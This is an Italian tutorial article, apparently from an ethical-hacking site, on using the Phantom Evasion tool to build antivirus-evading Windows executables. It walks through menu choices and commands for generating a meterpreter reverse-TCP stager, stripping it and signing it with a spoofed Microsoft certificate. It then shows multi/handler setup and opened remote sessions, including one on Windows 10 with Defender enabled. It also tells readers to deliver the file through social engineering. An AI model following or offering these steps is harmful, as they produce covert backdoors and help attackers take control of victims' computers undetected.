Bypassare il rilevamento antivirus con Phantom Payloads

Condividi questo articolo:


Secondo i corsi di hacking etico, il metasploit è lo strumento più utilizzato nel pentesting. Metasploit cerca di trovare i punti deboli della rete locale prima che lo faccia un aggressore. È lo strumento più comune utilizzato dagli aggressori per testare la sicurezza del sistema operativo. In Kali Linux metasploit viene preinstallato con un sacco di payloads che vengono utilizzati per generare eseguibili dannosi per hackerare diverse piattaforme. Ma oggi vi mostreremo uno strumento chiamato Phantom Evasion che viene utilizzato per generare eseguibili FUD (Fully Undetectable) con payload msfvenom, dimostrato nei corsi di hacking etico offerti dall’International Institute of Cyber Security. Secondo lo sviluppatore Phantom Evasion l’obiettivo principale è quello di bypassare il rilevamento degli antivirus.

  • Phantom Evasion è stato testato su Kali Linux 2018.4 amd64).
  • Per clonare la git digita git clone https://github.com/oddcod3/Phantom-Evasion.git
  • digita cd Phantom-Evasion
  • digita chmod u+x phantom-evasion.py
  • digita python3 phantom-evasion.py
  • Dopo il primo avvio potresti ricevere messaggi di errore, ma non preoccuparti, funzionerà tutto perfettamente.
                     _                 _
                 _ __ | |__   __ _ _ __ | |_ ___  _ __ ___
                | '_ \| '_ \ / _` | '_ \| __/ _ \| '_ ` _ \
                | |_) | | | | (_| | | | | || (_) | | | | | |
                | .__/|_| |_|\__,_|_| |_|\__\___/|_| |_| |_|
                |_|   / _ \ \ / / _` / __| |/ _ \| '_ \
                     |  __/\ V / (_| \__ \ | (_) | | | |
                      \___| \_/ \__,_|___/_|\___/|_| |_|
                                                        v2.0.1
=====================================================================
  ||        [MAIN MENU]:             ||                                  ||
  ||                                 ||                                  ||
  ||    [1]  Windows modules         ||   [5]  Universal modules         ||
  ||                                 ||                                  ||
  ||    [2]  Linux modules           ||   [6]  Post-Exploitation modules ||
  ||                                 ||                                  ||
  ||    [3]  OSX modules             ||   [7]  Update check              ||
  ||                                 ||                                  ||
  ||    [4]  Android modules         ||   [0]  Exit                      ||
  ||                                 ||                                  ||
    =====================================================================

[>] Please insert option:
  • Type 1
 [>] Please insert option: 1
  • Type 2
 [+] WINDOWS MODULES INDEX:
[1] Shellcode Injection
[2] Stager
[3] Powershell / Wine-pyinstaller
[0] Back
[>] Please insert option: 2
  • Type 1
 [+] WINDOWS STAGER MODULES:
[1] X86 stagers
[2] X64 stagers
[0] Back
[>] Please insert option: 1
  • Type 3
[+] WINDOWS x86 STAGER MODULES:
[1] C meterpreter/reverse_TCP VirtualAlloc (C)
[2] C meterpreter/reverse_TCP VirtualAlloc NoDirectCall GPAGMH (C)
[3] C meterpreter/reverse_TCP HeapAlloc (C)
[4] C meterpreter/reverse_TCP HeapAlloc NoDirectCall GPAGMH (C)
[5] C meterpreter/reverse_HTTP VirtualAlloc (C)
[6] C meterpreter/reverse_HTTP VirtualAlloc NoDirectCall GPAGMH (C)
[7] C meterpreter/reverse_HTTP HeapAlloc (C)
[8] C meterpreter/reverse_HTTP HeapAlloc NoDirectCall GPAGMH (C)
[9] C meterpreter/reverse_HTTPS VirtualAlloc (C)
[10] C meterpreter/reverse_HTTPS VirtualAlloc NoDirectCall GPAGMH (C)
[11] C meterpreter/reverse_HTTPS HeapAlloc (C)
[12] C meterpreter/reverse_HTTPS HeapAlloc NoDirectCall GPAGMH (C)
[0] Back
[+] MODULE DESCRIPTION:
This Module generate and compile
32bit pure c meterpreter reverse tcp stagers.
Require msfconsole multi/handler listener
with payload set to windows/meterpreter/reverse_tcp
[>] Memory allocation type: HEAP
[>] TYPE: TCP
[>] STATIC EVASION:
Polymorphic source code
[>] DYNAMIC EVASION:
Resource consumption technique
Sandbox-aware code
[>] AUTOCOMPILE(cross platform): to EXE file
Press Enter to continue:
  • Digita 192.168.1.6 (Listen/ Attacker’s IP address)
[>] Please insert LHOST: 192.168.1.6

  • Digita 443 (Listen/ Attacker’s Port)
[>] Please insert LPORT: 443

  • Dopo inserisci il nome del file : file
[>] Please insert output filename: file

Digitare n per creare solo un singolo processo nel computer di destinazione. In questo modo si riducono le possibilità di essere catturati dall’antivirus.

[>] Spawn Multiple Processes:
During target-side execution this will cause to spawn a maximum of 4 processes
consequentialy.
Only the last spawned process will reach the malicious section of code
while the other decoy processes spawned before will executes only random junk code
[>] Add multiple processes behaviour?(y/n): n
  • Digita y
[>] Generating C meterpreter stager
[>] Compiling…
[>] Strip
strip is a GNU utility to "strip" symbols from object files.
This is useful for minimizing their file size, streamlining them for distribution.
It can also be useful for making it more difficult to reverse-engineer the compiled code.
(Lower rate of detection)
[>] Strip executable? (y/n): y
  • La query di cui sopra ridurrà al minimo la dimensione del file dannoso.
  • Digita y
[>] Sign Executable
Online Certificate spoofer & Executabe signer (Lower rate of detection)
[>] Sign executable? (y/n): y
  • La query di cui sopra firmerà il file maligno con certificato predefinito viene fornito con Phantom Evasion
  • È possibile utilizzare il proprio certificato o utilizzarlo con il certificato Microsoft che viene fornito con phantom evasion.
  • Digita y
  • Digita 1
Certificates directory is not empty , use already existing certificate? (y/n): y
[1] www.microsoft.com
[2] Create new certificate
[>] Select a Certificate or create a new one: 1
  • Digita 1
[>] Select a Certificate or create a new one: 1

[>] Insert sign software description (default: Notepad Benchmark Util):
[>] Signing file1.exe with osslsigncode…
[>] Succeeded
[<>] File saved in Phantom-Evasion folder

Dopo aver creato il codice maligno inviare il file al bersaglio. Potete usare qualsiasi ingegneria sociale per ingannare il vostro bersaglio.

Test della piattaforma Windows :

  • Per i test utilizziamo Windows 10 (64 Bit) con Windows Defender Disabled.
  • Aprire il file eseguibile utilizzando premendo il tasto invio.
  • Per controllare il carico utile. È possibile utilizzare metasploit multi handler che viene fornito preinstallato in Kali Linux. Aprire un altro terminale e digitare msfconsole.
  • Digitare usa multi/handler
  • msf > use multi/handler

    Digitare LHOST 192.168.1.6 (lo stesso che avete inserito in phantom evasion).

  • Digitare LPORT 443 (lo stesso che avete inserito in phantom evasion).
  • Scegli “mostra le opzioni”
msf exploit(multi/handler) > set LHOST 192.168.1.6
LHOST => 192.168.1.6
msf exploit(multi/handler) > set LPORT 443
LPORT => 443
msf exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.6 yes The listen address (an interface may be specified)
LPORT 443 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
  • Digita run
msf exploit(multi/handler) > run

  • Dopo la digitazione eseguire una nuova sessione verrà creata una nuova sessione tra macchine attaccanti e macchine bersaglio.
  • Digita sysinfo per controllare i dettagli del computer di destinazione.
[] Started reverse TCP handler on 192.168.1.6:443 [] Sending stage (179779 bytes) to 192.168.1.9
[*] Meterpreter session 1 opened (192.168.1.6:443 -> 192.168.1.9:49250) at 2019-03-04 00:34:27 -0500
meterpreter > sysinfo
Computer : WIN-31VSBP3FUQT
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter >
  • Ora è possibile manipolare il bersaglio usando la shell del comando meterpreter.
  • Ora per ulteriori test abbiamo utilizzato Windows 10 Enterprise 1809 (x64) con Windows Defender abilitato.
  • Aprire l’exe maligno in Windows 10. All’apertura dell’exe verrà creata una nuova sessione in multi/ handler.
  • Digitare sysinfo per controllare i dettagli del computer di destinazione.
[] Started reverse TCP handler on 192.168.1.6:443 [] Sending stage (179779 bytes) to 192.168.1.105
[*] Meterpreter session 2 opened (192.168.1.6:443 -> 192.168.1.105:49753) at 2019-03-04 02:26:30 -0500
meterpreter > sysinfo
Computer : DESKTOP-I9LEAU8
OS : Windows 10 (Build 17758).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows

Ora è possibile manipolare il bersaglio usando la shell del comando meterpreter.

Secondo il ricercatore di hacking etico dell’International Institute of Cyber Security può essere utilizzato per generare un carico utile di livello iniziale che può essere ulteriormente personalizzato per bypassare altri Antivirus.



Per ulteriori informazioni visita il sito: immagi.net

Condividi questo articolo: